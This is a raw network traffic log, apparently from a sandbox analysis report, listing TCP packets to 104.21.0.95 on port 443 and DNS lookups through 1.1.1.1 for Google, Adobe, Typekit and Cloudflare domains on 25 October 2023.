                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.593260050 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.593266964 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.593278885 CEST44349865104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.593318939 CEST49865443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.660891056 CEST44349839104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.661876917 CEST44349839104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:18.661946058 CEST49839443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136431932 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136523008 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136568069 CEST49840443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136578083 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136596918 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136704922 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136754036 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136789083 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136854887 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136893988 CEST49840443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136893988 CEST49840443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136893988 CEST49840443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136900902 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136910915 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136967897 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.136998892 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.137025118 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.137146950 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.137187004 CEST49840443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.137187004 CEST49840443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.137187004 CEST49840443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.137198925 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.137269020 CEST44349840104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.137507915 CEST49840443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.356656075 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.356729031 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.356777906 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.356781006 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.356821060 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.356868029 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.356868982 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.356883049 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.356933117 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.356942892 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357026100 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357070923 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357070923 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357083082 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357122898 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357135057 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357212067 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357259035 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357270002 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357316971 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357374907 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357382059 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357707977 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357749939 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357752085 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357763052 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357801914 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.357809067 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.358316898 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.358366966 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.358375072 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.358438969 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.358445883 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.358634949 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.358683109 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.358691931 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.359208107 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.359270096 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.359278917 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360003948 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360044956 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360054970 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360063076 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360110044 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360117912 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360299110 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360340118 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360341072 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360354900 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360395908 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360404968 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360536098 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360586882 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360598087 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360606909 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360654116 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.360661030 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.361231089 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.361274958 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.361299038 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.361308098 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.361352921 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.361530066 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.361587048 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.450035095 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.450123072 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.450864077 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.450921059 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.451076031 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.451145887 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.451277018 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.451334953 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.451505899 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.451556921 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.451894045 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.451952934 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.452310085 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.452369928 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.452400923 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.452456951 CEST44349842104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:19.452512026 CEST49842443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:20.085166931 CEST44349854104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:20.085325956 CEST44349854104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:20.085449934 CEST49854443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:20.221724987 CEST44349863104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:20.221823931 CEST44349863104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:20.221874952 CEST44349863104.21.0.95192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:20.222018003 CEST49863443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:20.222018003 CEST49863443192.168.2.16104.21.0.95
                                                                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:14.715517044 CEST138138192.168.2.16192.168.2.255
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.447577000 CEST5919353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.447850943 CEST5785353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.448493004 CEST5171053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.448832035 CEST6501353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.509895086 CEST53630051.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.523173094 CEST53611011.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542383909 CEST53578531.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542401075 CEST53591931.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.542892933 CEST53517101.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.543540001 CEST53650131.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.012571096 CEST5933353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.012854099 CEST6123553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.013829947 CEST6126953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.014393091 CEST6192653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.014858961 CEST6182953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.015084028 CEST5960953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.015496016 CEST5127453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.015702963 CEST6117753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.106615067 CEST53593331.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.107243061 CEST53612351.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.108711958 CEST53618291.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.108781099 CEST53596091.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.172363997 CEST53566811.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.747064114 CEST5384553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.747705936 CEST5832153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.481472015 CEST5109153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.482033014 CEST5809753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.575298071 CEST53510911.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:18.576030970 CEST53580971.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.037647009 CEST53638081.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.538743019 CEST53642661.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:19.575247049 CEST53575711.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.746041059 CEST5807353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.746659040 CEST6185153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.840635061 CEST53580731.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:20.840672016 CEST53618511.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:22.416014910 CEST5054353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:22.416217089 CEST5448153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:22.510859966 CEST53544811.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:23.016927004 CEST5090653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:23.017357111 CEST6129553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:23.111236095 CEST53612951.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:24.118546009 CEST5566053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:24.118925095 CEST5762053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:24.214699030 CEST53576201.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:34.208174944 CEST53620441.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:35.736968994 CEST6130253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:35.737236977 CEST5595553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:36.084105968 CEST53559551.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:36.126713037 CEST53613021.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.229284048 CEST6162453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.229610920 CEST5716253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.230222940 CEST5203153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.230446100 CEST6252553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.323322058 CEST53571621.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.323962927 CEST53520311.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.324616909 CEST53625251.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:37.324940920 CEST53616241.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.022686005 CEST5146253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.022975922 CEST5756353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.116947889 CEST53514621.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:39.117445946 CEST53575631.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.261848927 CEST5964053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.262301922 CEST6441453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.666469097 CEST53596401.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.683001995 CEST6356053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.683296919 CEST6144453192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.708415031 CEST53644141.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.776552916 CEST53635601.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:40.777481079 CEST53614441.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.157977104 CEST6498753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.158207893 CEST6469653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.251642942 CEST53649871.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.251771927 CEST53646961.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.747625113 CEST4974653192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.747873068 CEST6027853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.841551065 CEST53497461.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:41.841824055 CEST53602781.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:52.910370111 CEST53605631.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:15.534486055 CEST53499971.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:16.079652071 CEST53528371.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.093729973 CEST5925253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.093930006 CEST6532153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.187495947 CEST53592521.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:25.187583923 CEST53653211.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.830554008 CEST5181253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.830974102 CEST5585053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.924148083 CEST53518121.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:40.924994946 CEST53558501.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:44.079328060 CEST53521811.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.744447947 CEST4996053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.744891882 CEST5817253192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.838511944 CEST53499601.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:28:45.838663101 CEST53581721.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.037513018 CEST5867553192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.037513018 CEST4948053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.038707018 CEST6535353192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.038707018 CEST6451153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.131339073 CEST53586751.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.131540060 CEST53494801.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.157300949 CEST53653531.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.181385994 CEST53562941.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.246088982 CEST53645111.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.616667032 CEST6061153192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.616791010 CEST5481753192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.710557938 CEST53548171.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.710638046 CEST53606111.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.731944084 CEST4994953192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.732014894 CEST5006053192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.845884085 CEST53499491.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.901010036 CEST53500601.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.246227980 CEST192.168.2.161.1.1.1c1f0(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:29:17.901243925 CEST192.168.2.161.1.1.1c1f0(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.447577000 CEST192.168.2.161.1.1.10xc8dcStandard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.447850943 CEST192.168.2.161.1.1.10x451cStandard query (0)clients2.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.448493004 CEST192.168.2.161.1.1.10x6f7dStandard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:16.448832035 CEST192.168.2.161.1.1.10x5aeStandard query (0)accounts.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.012571096 CEST192.168.2.161.1.1.10xb5f5Standard query (0)prod.adobeccstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.012854099 CEST192.168.2.161.1.1.10x6825Standard query (0)prod.adobeccstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.013829947 CEST192.168.2.161.1.1.10x3f2fStandard query (0)use.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.014393091 CEST192.168.2.161.1.1.10x6843Standard query (0)use.typekit.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.014858961 CEST192.168.2.161.1.1.10xbec0Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                              Oct 25, 2023 18:27:17.015084028 CEST192.168.2.161.1.1.10x4fe9Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
